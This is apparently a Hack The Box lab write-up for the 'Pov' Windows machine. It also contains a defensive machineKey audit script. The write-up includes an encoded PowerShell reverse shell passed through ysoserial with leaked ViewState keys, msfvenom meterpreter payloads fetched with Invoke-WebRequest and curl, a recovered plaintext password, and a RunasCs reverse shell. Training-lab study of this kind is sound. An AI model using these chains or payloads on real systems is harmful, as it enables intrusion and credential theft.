Hack The Box Lab, Season 4 Week 4: Pov machine
Target IP: 10.10.11.251
Information gathering
Run an nmap scan
┌──(kali㉿kali)-[~]
This gives us a website.
Web penetration
Directory brute force
┌──(kali㉿kali)-[~]
Nothing there. But there is a domain name at the bottom of the page.
Subdomain brute force
Let's try brute-forcing subdomains.
┌──(kali㉿kali)-[~]
We get the domain dev.pov.htb. Add it to the hosts file and take a look at what it is.
Arbitrary file download test
We find that files can be downloaded.
Try capturing the request with Burp.
The vulnerability is confirmed. Download the web config file.
We get the XML:
<configuration>
One entry is AES, which we can't do anything with without the key; the other is SHA1, which we couldn't crack.
ViewState deserialization vulnerability
Analysing these characteristics, there may be a ViewState deserialization vulnerability.
For how the vulnerability works, see this article: https://www.cnblogs.com/zpchcbd/p/15112047.html
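As an added defensive check that is not part of the original writeup, here is a small Python audit of the machineKey settings that make this chain possible: it flags static decryptionKey/validationKey values (once web.config leaks, they let anyone forge MAC-valid ViewState) and a legacy validation algorithm such as the SHA1 seen above. Both web.config samples are constructed, with placeholder key values rather than the ones from the box.

```python
import xml.etree.ElementTree as ET

# Constructed sample modelled on the web.config recovered above: a static
# <machineKey> with AES decryption and SHA1 validation. Key values are
# placeholders, not the ones from the box.
LEAKED_STYLE_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey decryption="AES" decryptionKey="PLACEHOLDER_DECRYPTION_KEY"
                validation="SHA1" validationKey="PLACEHOLDER_VALIDATION_KEY" />
  </system.web>
</configuration>
"""

# Constructed hardened counterpart: runtime-generated, per-app keys and HMACSHA256.
HARDENED_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey decryption="AES" decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" validationKey="AutoGenerate,IsolateApps" />
    <pages enableViewStateMac="true" viewStateEncryptionMode="Always" />
  </system.web>
</configuration>
"""

# Validation modes that predate HMACSHA256 (ASP.NET 4.5+ defaults to HMACSHA256).
LEGACY_VALIDATION = {"MD5", "SHA1", "3DES", "AES"}

def audit_machine_key(web_config_xml):
    """Return (severity, finding) tuples for the machineKey / ViewState settings."""
    findings = []
    sysweb = ET.fromstring(web_config_xml).find("system.web")
    mk = sysweb.find("machineKey") if sysweb is not None else None
    pages = sysweb.find("pages") if sysweb is not None else None
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append(("critical", "enableViewStateMac=false: ViewState is not integrity-checked"))
    if mk is None:
        return findings  # keys generated by the runtime; nothing static to leak
    for attr in ("decryptionKey", "validationKey"):
        value = mk.get(attr, "AutoGenerate")
        if not value.startswith("AutoGenerate"):
            findings.append(("high", f"static {attr}: anyone who can read web.config "
                                     "(here, via the file download bug) can forge MAC-valid ViewState"))
        elif "IsolateApps" not in value:
            findings.append(("low", f"{attr} lacks IsolateApps: key is shared by every app on the host"))
    validation = mk.get("validation")
    if validation and validation.upper() in LEGACY_VALIDATION:
        findings.append(("medium", f"validation={validation}: legacy MAC, move to HMACSHA256 or stronger"))
    return findings
```

Run it over a real web.config with `audit_machine_key(open("web.config").read())`; an empty list means none of these checks fired.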
PowerShell reverse shell
Since the target is a Windows host, use a PowerShell reverse shell.
Online shell generator: https://www.revshells.com/
Note: the IP is the one the VPN assigned to you; make sure you get the subnet right.
Generate the ciphertext with ysoserial
Download ysoserial.exe: https://github.com/pwntester/ysoserial.net/releases/tag/v1.36
1 | ./ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANAA1ACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" |
This yields the ciphertext.
Getting the reverse shell
Start a listener on Kali
┌──(root㉿Desktop-Trtyr)-[~]
Resend the request in Burp, replacing __VIEWSTATE with our ciphertext.
Go back to Kali and check the listener.
We get a shell.
Internal network penetration
Current user
Check the current user
PS C:\windows\system32\inetsrv> whoami
We are currently running as the sfitz user, so first move to that user's directory before doing anything else.
cd C:/Users/sfitz
Upload an MSF payload
Because of the VPN, a CS payload can't be used, so MSF is used here.
Generate a Windows payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.45 LPORT=8888 -f exe -o /root/Tools/payload/hack.exe
Start the listener
msfconsole
Set up an HTTP server
python3 -m http.server 80 --bind 10.10.14.45
That gives the payload URL: http://10.10.14.45/hack.exe. Now have the target fetch it:
Invoke-WebRequest -Uri "http://10.10.14.45:80/hack.exe" -OutFile ".\hack.exe"
Shell obtained.
Privilege escalation testing
Initial privilege escalation test
Here we try process migration directly to escalate privileges.
ps
We get a list of processes, but in the User column we can only see our own user. There is a winlogon.exe, the NT logon program, so let's migrate into that process.
migrate 544
It failed: this user's privileges are too low.
Switching users in MSF
Look through the Users directory
There are three users. Check the Documents folder.
Documents contains a connection.xml, which holds the alaading account's password.
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
Use the command:
$credential = Import-CliXml -Path C:\users\sfitz\documents\connection.xml
We get the password f8gQ8fynP44ek1m3.
runas /user:alaading /password:f8gQ8fynP44ek1m3 cmd
It failed.
Getting a shell with RunasCs
Grab RunasCs and have the target download it:
Invoke-WebRequest -Uri "http://10.10.14.45:80/RunasCs.exe" -OutFile ".\RunasCs.exe"
Open a listener on port 4444 on Kali, then run:
.\RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.14.45:4444
We're in. Look for the flag.
Got the flag.
Privilege escalation with MSF
Same routine: run the MSF privilege-escalation step once more, but this time we are in cmd, so download with curl.
curl -v -o ".\hack.exe" "http://10.10.14.45:80/Tools/payload/hack.exe"
Success!!! Just grab the flag.